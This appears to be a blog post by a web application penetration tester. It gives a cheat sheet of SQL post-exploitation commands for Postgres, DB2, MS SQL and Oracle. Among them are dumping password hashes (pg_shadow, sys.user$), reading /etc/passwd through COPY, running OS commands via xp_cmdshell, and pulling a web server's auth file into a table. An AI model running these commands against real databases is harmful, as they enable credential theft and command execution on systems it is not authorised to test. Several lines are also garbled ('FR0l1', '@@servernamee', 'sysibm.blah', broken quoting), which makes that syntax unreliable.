Saturday, February 13, 2016

Post Exploitation The Database Edition

As a web app pentester there is nothing more annoying then encountering a database that you have never worked with before and having to search all over the net for post exploitation commands in order to gather more information. So This is just a small list that i put together for myself and as time goes on this list will grow and i will continue to update this post. I hope this small list can help someone else out during a web app penetration test.

Postgres Post Exploitation Commands

select version();
select current_database();
select current_user;
select session_user;
select current_setting('log_connections');
select current_setting('log_statement');
select current_setting('port');
select current_setting('password_encryption');
select current_setting('krb_server_keyfile');
select current_setting('virtual_host');
select current_setting('port');
select current_setting('config_file');
select current_setting('hba_file');
select current_setting('data_directory');
select * from pg_shadow;
select * from pg_group;
create table myfile (input TEXT);
copy myfile from '/etc/passwd';
select * from myfile;copy myfile to /tmp/test;

DB2 Post Exploitation Commands

select versionnumber, version_timestamp from sysibm.sysversions;
select user from sysibm.blah;
select session_user from sysibm.blah;
select system_user from sysibm.blah;
select current server from sysibm.blah;
select name from sysibm.systables;
select grantee from syscat.dbauth;
select * from syscat.tabauth;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select name, tbname, coltype from sysibm.syscolumns;
SELECT schemaname FROM syscat.schemata;

MS SQL Post Exploitation Commands

select @@version
select @@servernamee
select @@microsoftversione
select * from master..sysserverse
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
exec master..xp_cmdshell 'ping+'
BACKUP database master to disks='\\\\backupdb.dat'
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select
* from myfile"--

Oracle Post Exploitation Commands

SELECT • FROM v$version;
SELECT version FROM v$instance;
SELECT instance name FROM v$instance;
SELECT name FROM v$database;
SELECT DISTINCT owner FROM all tables;
SELECT user FROM dual;
SELECT username FROM all users ORDER BY username;
SELECT column name FR0l1 all tab columns; SELECT table name FROM all tables;
SELECT name,-password, astatus FROt1 SJS.user$;


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